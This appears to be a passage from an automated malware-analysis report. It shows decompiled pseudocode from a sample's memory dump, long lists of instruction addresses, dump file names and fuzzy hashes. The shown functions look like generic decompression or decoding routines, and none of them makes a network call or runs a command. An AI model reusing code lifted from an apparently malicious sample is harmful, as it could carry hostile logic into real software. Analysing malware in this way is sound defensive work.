												L63:
												_t471 = _t471 + (_t435 & 0x0000ffff);
												__eflags = _t471;
												 *(_t658 + 0x30) = _t471;
												goto L64;
											}
										}
									}
								}
								L28:
								__eflags =  *((char*)(_t638 + 0x4c44));
								if( *((char*)(_t638 + 0x4c44)) == 0) {
									L30:
									_t598 = _t638 + 0x7c;
									 *( *((intOrPtr*)(_t638 + 0x4b40)) +  *_t598) = _t460;
									 *_t598 =  *_t598 + 1;
									continue;
								}
								L29:
								 *(_t638 + 0x7c) =  *(_t638 + 0x7c) + 1;
								 *(E00CB17A5(_t638 + 0x4b44,  *(_t638 + 0x7c))) = _t460;
								goto L0;
							}
						}
						L13:
						__eflags = _t483 -  *_t598;
						if(_t483 ==  *_t598) {
							goto L18;
						}
						L14:
						E00CB47DA(_t638);
						_t415 =  *((intOrPtr*)(_t638 + 0x4c5c));
						__eflags = _t415 -  *((intOrPtr*)(_t638 + 0x4c4c));
						if(__eflags > 0) {
							goto L100;
						}
						L15:
						if(__eflags < 0) {
							L17:
							__eflags =  *((char*)(_t638 + 0x4c50));
							if( *((char*)(_t638 + 0x4c50)) != 0) {
								L162:
								 *((char*)(_t638 + 0x4c60)) = 0;
								goto L100;
							}
							goto L18;
						}
						L16:
						_t415 =  *((intOrPtr*)(_t638 + 0x4c58));
						__eflags = _t415 -  *((intOrPtr*)(_t638 + 0x4c48));
						if(_t415 >  *((intOrPtr*)(_t638 + 0x4c48))) {
							goto L100;
						}
						goto L17;
					}
				}
			}









































































































































                0x00cb589e
                0x00cb589e
                0x00cb589e
                0x00cb589e
                0x00cb589e
                0x00cb58a1
                0x00cb58a1
                0x00cb58a7
                0x00cb58b2
                0x00000000
                0x00cb58b4
                0x00cb58b4
                0x00cb58b4
                0x00cb58ba
                0x00cb58ba
                0x00cb58c3
                0x00cb58c6
                0x00000000
                0x00000000
                0x00cb58d5
                0x00cb58dc
                0x00cb5e87
                0x00cb5e89
                0x00cb5e8e
                0x00cb5e95
                0x00cb5e95
                0x00cb58e2
                0x00cb58e2
                0x00cb58e3
                0x00cb58e6
                0x00cb58ed
                0x00000000
                0x00000000
                0x00cb58f3
                0x00cb58fb
                0x00cb58fc
                0x00cb58fd
                0x00cb58fe
                0x00cb5905
                0x00000000
                0x00cb5907
                0x00000000
                0x00cb5907
                0x00cb5905
                0x00cb590c
                0x00cb590e
                0x00cb5913
                0x00cb5915
                0x00000000
                0x00cb591b
                0x00cb591b
                0x00cb591b
                0x00cb591e
                0x00cb591e
                0x00cb592e
                0x00cb5933
                0x00cb5973
                0x00cb5975
                0x00cb597c
                0x00cb5982
                0x00cb5988
                0x00cb598f
                0x00cb59bb
                0x00cb59bd
                0x00cb59be
                0x00cb59bf
                0x00cb59c1
                0x00cb59da
                0x00cb59dd
                0x00cb59e4
                0x00cb59e7
                0x00cb59ea
                0x00cb59f6
                0x00cb5a02
                0x00cb5a04
                0x00cb5a0a
                0x00cb5a0c
                0x00cb5a0c
                0x00cb5a0e
                0x00000000
                0x00cb59c3
                0x00cb59c6
                0x00cb59c9
                0x00cb59c9
                0x00cb59c9
                0x00cb59cb
                0x00cb59d8
                0x00cb59d8
                0x00cb59d8
                0x00cb59cd
                0x00cb59cd
                0x00cb59ce
                0x00cb59d1
                0x00cb59d4
                0x00000000
                0x00cb59d6
                0x00000000
                0x00cb59d6
                0x00cb59d4
                0x00000000
                0x00cb59c9
                0x00cb5991
                0x00cb5993
                0x00cb5996
                0x00cb59a0
                0x00cb59a8
                0x00cb59ae
                0x00cb59b1
                0x00cb5a16
                0x00cb5a16
                0x00cb5a1c
                0x00cb5a58
                0x00cb5a58
                0x00cb5a5e
                0x00cb5e5a
                0x00cb5e5a
                0x00cb5e60
                0x00cb5e98
                0x00cb5e98
                0x00cb5e9e
                0x00cb603b
                0x00cb603b
                0x00cb603b
                0x00cb6044
                0x00cb6047
                0x00cb6049
                0x00cb604d
                0x00cb605c
                0x00cb605e
                0x00cb6061
                0x00cb6068
                0x00cb606e
                0x00cb6074
                0x00cb607b
                0x00cb60a7
                0x00cb60a9
                0x00cb60aa
                0x00cb60ab
                0x00cb60ad
                0x00cb60c9
                0x00cb60cc
                0x00cb60d3
                0x00cb60d6
                0x00cb60d9
                0x00cb60e5
                0x00cb60f1
                0x00cb60f3
                0x00cb60f9
                0x00cb60fb
                0x00cb60fb
                0x00cb60fd
                0x00cb6105
                0x00cb6105
                0x00cb6108
                0x00cb610b
                0x00cb611c
                0x00cb611f
                0x00cb611f
                0x00cb610d
                0x00cb610d
                0x00cb610d
                0x00cb6121
                0x00cb6124
                0x00cb6126
                0x00cb612a
                0x00cb6131
                0x00cb6139
                0x00cb613b
                0x00cb6142
                0x00cb6145
                0x00cb6145
                0x00cb6148
                0x00cb6148
                0x00cb614b
                0x00cb6152
                0x00cb6156
                0x00cb6159
                0x00cb616b
                0x00cb616b
                0x00cb6176
                0x00cb6178
                0x00cb617d
                0x00cb617f
                0x00cb6224
                0x00cb6224
                0x00cb6226
                0x00cb589e
                0x00cb589e
                0x00cb589e
                0x00cb589e
                0x00000000
                0x00cb589e
                0x00cb589e
                0x00cb622c
                0x00cb622c
                0x00cb6232
                0x00cb6232
                0x00cb6238
                0x00cb623d
                0x00cb6241
                0x00cb6244
                0x00cb6249
                0x00cb6252
                0x00cb6254
                0x00cb6254
                0x00cb6254
                0x00000000
                0x00cb6232
                0x00cb6185
                0x00cb6185
                0x00cb6187
                0x00000000
                0x00000000
                0x00cb618d
                0x00cb618d
                0x00cb6193
                0x00cb6195
                0x00cb619b
                0x00cb619e
                0x00cb61a0
                0x00cb61f1
                0x00cb61f1
                0x00cb61f4
                0x00000000
                0x00000000
                0x00cb61fa
                0x00cb61fc
                0x00cb61fc
                0x00cb61ff
                0x00cb6203
                0x00cb6205
                0x00cb6205
                0x00cb6209
                0x00cb620e
                0x00cb6211
                0x00cb6214
                0x00cb6217
                0x00cb621a
                0x00cb621a
                0x00cb621a
                0x00000000
                0x00cb621f
                0x00cb61a2
                0x00cb61a4
                0x00cb61a5
                0x00cb61a7
                0x00000000
                0x00000000
                0x00cb61ad
                0x00cb61af
                0x00cb61af
                0x00cb61b2
                0x00cb61b2
                0x00cb61b4
                0x00cb61b6
                0x00cb61bc
                0x00cb61c2
                0x00cb61c8
                0x00cb61ce
                0x00cb61d4
                0x00cb61da
                0x00cb61dd
                0x00cb61e0
                0x00cb61e2
                0x00cb61e5
                0x00cb61e7
                0x00cb61e7
                0x00cb61e7
                0x00000000
                0x00cb615b
                0x00cb615b
                0x00cb615b
                0x00cb6164
                0x00cb6165
                0x00cb5cb9
                0x00cb5cb9
                0x00cb5cc0
                0x00cb5cc5
                0x00cb589e
                0x00cb589e
                0x00cb589e
                0x00cb589e
                0x00cb589e
                0x00cb58a1
                0x00cb58a1
                0x00cb58a1
                0x00cb58a7
                0x00cb58b2
                0x00000000
                0x00cb58b4
                0x00cb58b4
                0x00cb58b4
                0x00000000
                0x00cb58b2
                0x00000000
                0x00cb58a1
                0x00cb5eb2
                0x00cb5eb9
                0x00cb5ecd
                0x00cb5ecd
                0x00cb5ed8
                0x00cb5edb
                0x00cb5ee0
                0x00cb5ee2
                0x00cb5ee4
                0x00cb6001
                0x00cb6001
                0x00cb6003
                0x00cb589e
                0x00cb589e
                0x00cb589e
                0x00cb589e
                0x00cb58a1
                0x00cb58a7
                0x00cb58b2
                0x00000000
                0x00cb58b4
                0x00cb58b4
                0x00cb58b4
                0x00cb58b2
                0x00cb589e
                0x00cb6009
                0x00cb6009
                0x00cb600f
                0x00cb600f
                0x00cb6015
                0x00cb601a
                0x00cb601e
                0x00cb6021
                0x00cb6026
                0x00cb602f
                0x00cb6031
                0x00cb6031
                0x00cb6031
                0x00cb6259
                0x00cb6259
                0x00000000
                0x00cb6259
                0x00cb5eea
                0x00cb5eea
                0x00cb5eec
                0x00000000
                0x00000000
                0x00cb5ef2
                0x00cb5ef2
                0x00cb5ef8
                0x00cb5efa
                0x00cb5f00
                0x00cb5f03
                0x00cb5f05
                0x00cb5f4f
                0x00cb5f4f
                0x00cb5f52
                0x00cb5f7d
                0x00cb5f7d
                0x00cb5f80
                0x00cb5f82
                0x00000000
                0x00000000
                0x00cb5f88
                0x00cb5f8a
                0x00cb5f8d
                0x00cb5f90
                0x00cb5f93
                0x00000000
                0x00000000
                0x00cb5f99
                0x00cb5f9c
                0x00cb5f9f
                0x00cb5fa2
                0x00cb5fa5
                0x00000000
                0x00000000
                0x00cb5fab
                0x00cb5fae
                0x00cb5fb1
                0x00cb5fb4
                0x00cb5fb7
                0x00000000
                0x00000000
                0x00cb5fbd
                0x00cb5fc0
                0x00cb5fc3
                0x00cb5fc6
                0x00cb5fc9
                0x00000000
                0x00000000
                0x00cb5fcf
                0x00cb5fd2
                0x00cb5fd5
                0x00cb5fd8
                0x00cb5fdb
                0x00000000
                0x00000000
                0x00cb5fe1
                0x00cb5fe4
                0x00cb5fe7
                0x00cb5fea
                0x00cb5fed
                0x00000000
                0x00000000
                0x00cb5ff3
                0x00cb5ff6
                0x00cb589e
                0x00cb589e
                0x00cb589e
                0x00cb589e
                0x00000000
                0x00cb589e
                0x00cb589e
                0x00cb5f54
                0x00cb5f56
                0x00cb5f56
                0x00cb5f59
                0x00cb5f5d
                0x00cb5f5f
                0x00cb5f5f
                0x00cb5f63
                0x00cb5f68
                0x00cb5f6b
                0x00cb5f6e
                0x00cb5f71
                0x00cb5f74
                0x00cb5f74
                0x00cb5f74
                0x00cb5f79
                0x00cb5f79
                0x00000000
                0x00cb5f79
                0x00cb5f07
                0x00cb5f09
                0x00cb5f0a
                0x00cb5f0c
                0x00000000
                0x00000000
                0x00cb5f0e
                0x00cb5f10
                0x00cb5f10
                0x00cb5f13
                0x00cb5f13
                0x00cb5f15
                0x00cb5f17
                0x00cb5f1d
                0x00cb5f23
                0x00cb5f29
                0x00cb5f2f
                0x00cb5f35
                0x00cb5f3b
                0x00cb5f3e
                0x00cb5f41
                0x00cb5f43
                0x00cb5f46
                0x00cb5f48
                0x00cb5f48
                0x00cb5f48
                0x00000000
                0x00cb5f4d
                0x00cb5ebb
                0x00cb5ebb
                0x00cb5ec4
                0x00cb5ec5
                0x00000000
                0x00cb5ec5
                0x00cb5e73
                0x00cb5e7a
                0x00cb5e7f
                0x00cb5e7f
                0x00000000
                0x00cb589e
                0x00cb6159
                0x00cb60af
                0x00cb60b5
                0x00cb60b8
                0x00cb60b8
                0x00cb60b8
                0x00cb60ba
                0x00000000
                0x00000000
                0x00cb60bc
                0x00cb60bc
                0x00cb60bd
                0x00cb60c0
                0x00cb60c3
                0x00000000
                0x00000000
                0x00cb60c5
                0x00000000
                0x00cb60c5
                0x00cb60c7
                0x00cb60c7
                0x00000000
                0x00cb60c7
                0x00cb607d
                0x00cb607f
                0x00cb6082
                0x00cb608c
                0x00cb6094
                0x00cb609a
                0x00cb609d
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00cb604f
                0x00cb604f
                0x00cb6052
                0x00cb6054
                0x00cb6057
                0x00cb6057
                0x00cb6057
                0x00000000
                0x00cb604f
                0x00cb5ea4
                0x00cb5ea4
                0x00cb5ea7
                0x00cb5eaa
                0x00cb5eaa
                0x00cb5e62
                0x00cb5e68
                0x00cb5e6a
                0x00cb5e6f
                0x00cb5e71
                0x00000000
                0x00000000
                0x00000000
                0x00cb5e71
                0x00cb5a64
                0x00cb5a64
                0x00cb5a6a
                0x00cb5a6d
                0x00cb5a7e
                0x00cb5a81
                0x00cb5a81
                0x00cb5a6f
                0x00cb5a6f
                0x00cb5a6f
                0x00cb5a83
                0x00cb5a86
                0x00cb5a88
                0x00cb5a8c
                0x00cb5a93
                0x00cb5a9b
                0x00cb5a9d
                0x00cb5aa4
                0x00cb5aa7
                0x00cb5aa7
                0x00cb5aaa
                0x00cb5aaa
                0x00cb5aaf
                0x00cb5ab6
                0x00cb5abc
                0x00cb5ac2
                0x00cb5ac9
                0x00cb5af5
                0x00cb5af7
                0x00cb5af8
                0x00cb5af9
                0x00cb5afb
                0x00cb5b17
                0x00cb5b1a
                0x00cb5b21
                0x00cb5b24
                0x00cb5b27
                0x00cb5b33
                0x00cb5b3f
                0x00cb5b41
                0x00cb5b47
                0x00cb5b49
                0x00cb5b49
                0x00cb5b4b
                0x00000000
                0x00cb5b4b
                0x00cb5afd
                0x00cb5b03
                0x00cb5b06
                0x00cb5b06
                0x00cb5b06
                0x00cb5b08
                0x00000000
                0x00000000
                0x00cb5b0a
                0x00cb5b0a
                0x00cb5b0b
                0x00cb5b0e
                0x00cb5b11
                0x00000000
                0x00000000
                0x00cb5b13
                0x00000000
                0x00cb5b13
                0x00cb5b15
                0x00cb5b15
                0x00000000
                0x00cb5acb
                0x00cb5acb
                0x00cb5acd
                0x00cb5ad0
                0x00cb5ada
                0x00cb5ae2
                0x00cb5ae8
                0x00cb5aeb
                0x00cb5b53
                0x00cb5b53
                0x00cb5b56
                0x00cb5b59
                0x00cb5b69
                0x00cb5b6c
                0x00cb5b6c
                0x00cb5b5b
                0x00cb5b5b
                0x00cb5b5b
                0x00cb5b6e
                0x00cb5b6f
                0x00cb5b73
                0x00cb5b75
                0x00cb5b79
                0x00cb5b7b
                0x00cb5c6f
                0x00cb5c6f
                0x00000000
                0x00cb5b81
                0x00cb5b81
                0x00cb5b81
                0x00cb5b84
                0x00cb5cca
                0x00cb5ccd
                0x00cb5cd6
                0x00cb5cde
                0x00cb5ce2
                0x00cb5ce6
                0x00cb5ced
                0x00cb5cf0
                0x00cb5cf6
                0x00cb5c72
                0x00cb5c72
                0x00cb5c78
                0x00cb5c7a
                0x00cb5c7b
                0x00cb5c81
                0x00cb5c83
                0x00cb5c84
                0x00cb5c8a
                0x00cb5c8c
                0x00cb5c8c
                0x00cb5c8c
                0x00cb5c8a
                0x00cb5c81
                0x00cb5c90
                0x00cb5c96
                0x00cb5c9c
                0x00cb5c9f
                0x00cb5ca2
                0x00cb5ca9
                0x00cb5cac
                0x00cb5cfe
                0x00cb5d04
                0x00cb5d07
                0x00cb5d09
                0x00cb5d10
                0x00cb5d12
                0x00cb5d14
                0x00cb5e20
                0x00cb5e20
                0x00cb5e22
                0x00000000
                0x00000000
                0x00cb5e28
                0x00cb5e28
                0x00cb5e2e
                0x00cb5e2e
                0x00cb5e34
                0x00cb5e39
                0x00cb5e3d
                0x00cb5e40
                0x00cb5e45
                0x00cb5e4e
                0x00cb5e50
                0x00cb5e50
                0x00cb5e50
                0x00000000
                0x00cb5e55
                0x00cb5d1a
                0x00cb5d1a
                0x00cb5d1c
                0x00000000
                0x00000000
                0x00cb5d22
                0x00cb5d22
                0x00cb5d28
                0x00cb5d2b
                0x00cb5d31
                0x00cb5d33
                0x00cb5d37
                0x00cb5d82
                0x00cb5d82
                0x00cb5d85
                0x00cb5db4
                0x00cb5db4
                0x00cb5db6
                0x00cb5dbe
                0x00cb5dc1
                0x00cb5dc4
                0x00cb5dcd
                0x00cb5dd0
                0x00cb5dd3
                0x00cb5ddc
                0x00cb5ddf
                0x00cb5de2
                0x00cb5deb
                0x00cb5dee
                0x00cb5df1
                0x00cb5dfa
                0x00cb5dfd
                0x00cb5e00
                0x00cb5e09
                0x00cb5e0c
                0x00cb5e0f
                0x00cb5e18
                0x00cb5e18
                0x00cb5e0f
                0x00cb5e00
                0x00cb5df1
                0x00cb5de2
                0x00cb5dd3
                0x00cb5dc4
                0x00000000
                0x00cb5db6
                0x00cb5d87
                0x00cb5d89
                0x00cb5d89
                0x00cb5d8c
                0x00cb5d90
                0x00cb5d92
                0x00cb5d92
                0x00cb5d96
                0x00cb5d9b
                0x00cb5d9e
                0x00cb5da1
                0x00cb5da4
                0x00cb5da7
                0x00cb5da7
                0x00cb5da7
                0x00cb5dac
                0x00cb5db0
                0x00000000
                0x00cb5db0
                0x00cb5d39
                0x00cb5d39
                0x00cb5d3c
                0x00000000
                0x00000000
                0x00cb5d3e
                0x00cb5d40
                0x00cb5d40
                0x00cb5d43
                0x00cb5d43
                0x00cb5d45
                0x00cb5d48
                0x00cb5d4e
                0x00cb5d54
                0x00cb5d5a
                0x00cb5d60
                0x00cb5d66
                0x00cb5d6c
                0x00cb5d6f
                0x00cb5d72
                0x00cb5d75
                0x00cb5d78
                0x00cb5d7b
                0x00cb5d7b
                0x00cb5d7b
                0x00000000
                0x00cb5cae
                0x00cb5cae
                0x00cb5cae
                0x00cb5cb7
                0x00cb5cb8
                0x00000000
                0x00cb5cb8
                0x00cb5cac
                0x00cb5b8a
                0x00cb5b8a
                0x00cb5bbd
                0x00cb5b8c
                0x00cb5b8f
                0x00cb5b98
                0x00cb5ba0
                0x00cb5ba3
                0x00cb5bab
                0x00cb5bb2
                0x00cb5bb8
                0x00cb5bb8
                0x00cb5bc2
                0x00cb5bc9
                0x00cb5bcf
                0x00cb5bd5
                0x00cb5bdc
                0x00cb5c08
                0x00cb5c0a
                0x00cb5c0b
                0x00cb5c0c
                0x00cb5c0e
                0x00cb5c2a
                0x00cb5c2d
                0x00cb5c34
                0x00cb5c37
                0x00cb5c3a
                0x00cb5c46
                0x00cb5c52
                0x00cb5c54
                0x00cb5c5a
                0x00cb5c5c
                0x00cb5c5c
                0x00cb5c5e
                0x00000000
                0x00cb5c5e
                0x00cb5c10
                0x00cb5c16
                0x00cb5c19
                0x00cb5c19
                0x00cb5c19
                0x00cb5c1b
                0x00000000
                0x00000000
                0x00cb5c1d
                0x00cb5c1d
                0x00cb5c1e
                0x00cb5c21
                0x00cb5c24
                0x00000000
                0x00000000
                0x00cb5c26
                0x00000000
                0x00cb5c26
                0x00cb5c28
                0x00cb5c28
                0x00000000
                0x00cb5bde
                0x00cb5bde
                0x00cb5be0
                0x00cb5be3
                0x00cb5bed
                0x00cb5bf5
                0x00cb5bfb
                0x00cb5bfe
                0x00cb5c66
                0x00cb5c69
                0x00cb5c69
                0x00cb5c6b
                0x00000000
                0x00cb5c6b
                0x00cb5bdc
                0x00cb5b7b
                0x00cb5ac9
                0x00cb5a1e
                0x00cb5a1e
                0x00cb5a25
                0x00cb5a43
                0x00cb5a49
                0x00cb5a4e
                0x00cb5a51
                0x00000000
                0x00cb5a51
                0x00cb5a27
                0x00cb5a34
                0x00cb5a3c
                0x00000000
                0x00cb5a3c
                0x00cb598f
                0x00cb5935
                0x00cb5935
                0x00cb5937
                0x00000000
                0x00000000
                0x00cb5939
                0x00cb593b
                0x00cb5940
                0x00cb5946
                0x00cb594c
                0x00000000
                0x00000000
                0x00cb5952
                0x00cb5952
                0x00cb5966
                0x00cb5966
                0x00cb596d
                0x00cb6261
                0x00cb6261
                0x00000000
                0x00cb6261
                0x00000000
                0x00cb596d
                0x00cb5954
                0x00cb5954
                0x00cb595a
                0x00cb5960
                0x00000000
                0x00000000
                0x00000000
                0x00cb5960
                0x00cb58a1

                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d3517455ed077684b57ae8bd58154d4900c5f7fd798b82540100c2480b2df186
                • Instruction ID: a209a8b674b29cceb6d55b9f817b0c108de3e1ab2003d5ad7cc5e44a4f384fda
                • Opcode Fuzzy Hash: d3517455ed077684b57ae8bd58154d4900c5f7fd798b82540100c2480b2df186
                • Instruction Fuzzy Hash: 73622771604B858FCB29CF78C8907F9BBE1AF95304F08856ED9AA8B346D734EA45D710
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CB6CDB, Relevance: .8, Instructions: 773COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 98%
                			E00CB6CDB(void* __ecx) {
				intOrPtr* _t347;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				void* _t365;
				intOrPtr _t370;
				signed int _t380;
				char _t389;
				unsigned int _t390;
				signed int _t397;
				void* _t399;
				intOrPtr _t404;
				signed int _t407;
				char _t416;
				signed int _t417;
				char _t418;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t425;
				signed int _t426;
				signed short _t427;
				signed int _t430;
				void* _t435;
				intOrPtr _t440;
				signed int _t443;
				char _t452;
				unsigned int _t453;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				signed int _t461;
				signed int _t462;
				signed short _t463;
				unsigned int _t467;
				unsigned int _t472;
				intOrPtr _t489;
				signed int _t490;
				signed int _t491;
				signed int _t492;
				signed int _t493;
				unsigned int _t496;
				unsigned int _t498;
				intOrPtr _t499;
				signed int _t501;
				intOrPtr _t505;
				intOrPtr _t506;
				intOrPtr _t507;
				unsigned int _t510;
				void* _t512;
				signed int _t515;
				signed int* _t518;
				unsigned int _t521;
				void* _t523;
				signed int _t526;
				signed int _t529;
				intOrPtr _t530;
				void* _t532;
				signed int _t535;
				signed int _t536;
				intOrPtr* _t538;
				void* _t539;
				signed int _t542;
				intOrPtr _t545;
				unsigned int _t552;
				void* _t554;
				signed int _t557;
				signed int _t559;
				signed int _t561;
				intOrPtr _t563;
				void* _t565;
				signed int _t568;
				signed int _t569;
				signed int _t571;
				signed int _t573;
				void* _t575;
				signed int _t578;
				intOrPtr* _t580;
				void* _t581;
				signed int _t584;
				void* _t587;
				signed int _t590;
				intOrPtr* _t593;
				void* _t594;
				signed int _t597;
				void* _t600;
				signed int _t603;
				intOrPtr* _t607;
				void* _t608;
				signed int _t611;
				signed int _t614;
				unsigned int _t616;
				signed int _t619;
				signed int _t620;
				unsigned int _t622;
				signed int _t625;
				signed int _t628;
				signed int _t629;
				signed int _t630;
				signed int _t633;
				unsigned int _t635;
				signed int _t638;
				signed int _t641;
				signed int _t644;
				intOrPtr* _t645;
				unsigned int _t647;
				signed int _t650;
				signed int _t651;
				signed int _t652;
				signed int _t653;
				intOrPtr _t654;
				signed int _t655;
				signed int _t656;
				signed int _t657;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t662;
				void* _t663;
				intOrPtr _t666;
				intOrPtr* _t667;
				intOrPtr* _t668;
				signed int _t671;
				signed int _t673;
				intOrPtr* _t675;
				signed int _t677;
				signed int _t680;
				intOrPtr* _t681;
				signed int _t682;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				void* _t691;

				_t654 =  *((intOrPtr*)(_t691 + 0x34));
				_t663 = __ecx;
				if( *((char*)(_t654 + 0x2c)) != 0) {
					L3:
					_t505 =  *((intOrPtr*)(_t654 + 0x18));
					__eflags =  *((intOrPtr*)(_t654 + 4)) -  *((intOrPtr*)(_t654 + 0x24)) + _t505;
					if( *((intOrPtr*)(_t654 + 4)) >  *((intOrPtr*)(_t654 + 0x24)) + _t505) {
						L2:
						 *((char*)(_t654 + 0x4ad0)) = 1;
						return 0;
					} else {
						_t489 =  *((intOrPtr*)(_t654 + 0x4acc)) - 0x10;
						_t666 = _t505 - 1 +  *((intOrPtr*)(_t654 + 0x20));
						 *((intOrPtr*)(_t691 + 0x14)) = _t666;
						 *((intOrPtr*)(_t691 + 0x10)) = _t489;
						 *((intOrPtr*)(_t691 + 0x20)) = _t666;
						__eflags = _t666 - _t489;
						if(_t666 >= _t489) {
							 *((intOrPtr*)(_t691 + 0x20)) = _t489;
						}
						_t347 = _t654 + 4;
						while(1) {
							_t614 =  *(_t663 + 0xe6dc);
							 *(_t663 + 0x7c) =  *(_t663 + 0x7c) & _t614;
							_t506 =  *_t347;
							__eflags = _t506 -  *((intOrPtr*)(_t691 + 0x20));
							if(_t506 <  *((intOrPtr*)(_t691 + 0x20))) {
								goto L16;
							}
							L10:
							__eflags = _t506 - _t666;
							if(__eflags > 0) {
								L100:
								_t418 = 1;
								L101:
								return _t418;
							}
							if(__eflags != 0) {
								L13:
								__eflags = _t506 - _t499;
								if(_t506 < _t499) {
									L15:
									__eflags = _t506 -  *((intOrPtr*)(_t654 + 0x4acc));
									if(_t506 >=  *((intOrPtr*)(_t654 + 0x4acc))) {
										L151:
										 *((char*)(_t654 + 0x4ad3)) = 1;
										goto L100;
									}
									goto L16;
								}
								__eflags =  *((char*)(_t654 + 0x4ad2));
								if( *((char*)(_t654 + 0x4ad2)) == 0) {
									goto L151;
								}
								goto L15;
							}
							__eflags =  *(_t654 + 8) -  *((intOrPtr*)(_t654 + 0x1c));
							if( *(_t654 + 8) >=  *((intOrPtr*)(_t654 + 0x1c))) {
								goto L100;
							}
							goto L13;
							L16:
							_t507 =  *((intOrPtr*)(_t663 + 0x4b3c));
							__eflags = (_t507 -  *(_t663 + 0x7c) & _t614) - 0x1004;
							if((_t507 -  *(_t663 + 0x7c) & _t614) >= 0x1004) {
								L21:
								_t667 = _t654 + 4;
								_t351 = E00CAA4ED(_t667);
								_t352 =  *(_t654 + 0xb4);
								_t616 = _t351 & 0x0000fffe;
								__eflags = _t616 -  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4));
								if(_t616 >=  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4))) {
									_t490 = 0xf;
									_t353 = _t352 + 1;
									__eflags = _t353 - _t490;
									if(_t353 >= _t490) {
										L30:
										_t510 =  *(_t667 + 4) + _t490;
										 *(_t667 + 4) = _t510 & 0x00000007;
										_t355 = _t510 >> 3;
										 *_t667 =  *_t667 + _t355;
										_t512 = 0x10;
										_t515 =  *((intOrPtr*)(_t654 + 0x74 + _t490 * 4)) + (_t616 -  *((intOrPtr*)(_t654 + 0x30 + _t490 * 4)) >> _t512 - _t490);
										__eflags = _t515 -  *((intOrPtr*)(_t654 + 0x30));
										asm("sbb eax, eax");
										_t356 = _t355 & _t515;
										__eflags = _t356;
										_t619 =  *(_t654 + 0xcb8 + _t356 * 2) & 0x0000ffff;
										_t347 = _t654 + 4;
										L31:
										__eflags = _t619 - 0x100;
										if(_t619 >= 0x100) {
											__eflags = _t619 - 0x106;
											if(_t619 < 0x106) {
												__eflags = _t619 - 0x100;
												if(_t619 != 0x100) {
													__eflags = _t619 - 0x101;
													if(_t619 != 0x101) {
														_t620 = _t619 + 0xfffffefe;
														__eflags = _t620;
														_t518 =  &((_t663 + 0x60)[_t620]);
														_t491 =  *_t518;
														 *(_t691 + 0x24) = _t491;
														if(_t620 == 0) {
															L122:
															_t668 = _t654 + 4;
															 *(_t663 + 0x60) = _t491;
															_t357 = E00CAA4ED(_t668);
															_t358 =  *(_t654 + 0x2d78);
															_t622 = _t357 & 0x0000fffe;
															__eflags = _t622 -  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4));
															if(_t622 >=  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4))) {
																_t492 = 0xf;
																_t359 = _t358 + 1;
																__eflags = _t359 - _t492;
																if(_t359 >= _t492) {
																	L130:
																	_t521 =  *(_t668 + 4) + _t492;
																	 *(_t668 + 4) = _t521 & 0x00000007;
																	_t361 = _t521 >> 3;
																	 *_t668 =  *_t668 + _t361;
																	_t523 = 0x10;
																	_t526 =  *((intOrPtr*)(_t654 + 0x2d38 + _t492 * 4)) + (_t622 -  *((intOrPtr*)(_t654 + 0x2cf4 + _t492 * 4)) >> _t523 - _t492);
																	__eflags = _t526 -  *((intOrPtr*)(_t654 + 0x2cf4));
																	asm("sbb eax, eax");
																	_t362 = _t361 & _t526;
																	__eflags = _t362;
																	_t363 =  *(_t654 + 0x397c + _t362 * 2) & 0x0000ffff;
																	L131:
																	_t493 = _t363 & 0x0000ffff;
																	__eflags = _t493 - 8;
																	if(_t493 >= 8) {
																		_t671 = (_t493 >> 2) - 1;
																		_t493 = (_t493 & 0x00000003 | 0x00000004) << _t671;
																		__eflags = _t493;
																	} else {
																		_t671 = 0;
																	}
																	_t496 = _t493 + 2;
																	__eflags = _t671;
																	if(_t671 != 0) {
																		_t390 = E00CAA4ED(_t654 + 4);
																		_t532 = 0x10;
																		_t496 = _t496 + (_t390 >> _t532 - _t671);
																		_t535 =  *(_t654 + 8) + _t671;
																		 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t535 >> 3);
																		_t536 = _t535 & 0x00000007;
																		__eflags = _t536;
																		 *(_t654 + 8) = _t536;
																	}
																	_t625 =  *(_t663 + 0x7c);
																	_t673 = _t625 -  *(_t691 + 0x24);
																	_t365 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
																	 *(_t663 + 0x74) = _t496;
																	__eflags = _t673 - _t365;
																	if(_t673 >= _t365) {
																		L147:
																		_t347 = _t654 + 4;
																		__eflags = _t496;
																		if(_t496 == 0) {
																			goto L7;
																		}
																		_t655 =  *(_t663 + 0xe6dc);
																		do {
																			_t656 = _t655 & _t673;
																			_t673 = _t673 + 1;
																			 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)(_t656 +  *((intOrPtr*)(_t663 + 0x4b40))));
																			_t655 =  *(_t663 + 0xe6dc);
																			 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t655;
																			_t496 = _t496 - 1;
																			__eflags = _t496;
																		} while (_t496 != 0);
																		L150:
																		_t654 =  *((intOrPtr*)(_t691 + 0x3c));
																		L33:
																		_t347 = _t654 + 4;
